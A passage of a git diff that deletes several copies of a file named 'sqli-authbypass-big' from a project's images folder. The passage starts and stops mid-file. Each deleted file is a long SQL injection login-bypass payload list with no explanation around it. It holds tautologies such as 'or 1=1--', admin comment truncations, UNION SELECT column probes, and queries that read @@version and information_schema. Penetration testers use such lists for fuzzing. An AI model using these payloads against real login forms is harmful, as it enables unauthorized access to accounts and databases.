-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
